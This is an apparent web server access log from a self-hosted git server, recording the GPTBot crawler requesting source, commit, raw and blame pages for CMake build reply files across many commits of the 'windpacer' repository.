"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14318] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14318] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10656] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10655] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10656] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10087] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14603] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14323] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14601] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14294] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14576] [Gzip 9.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10631] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr 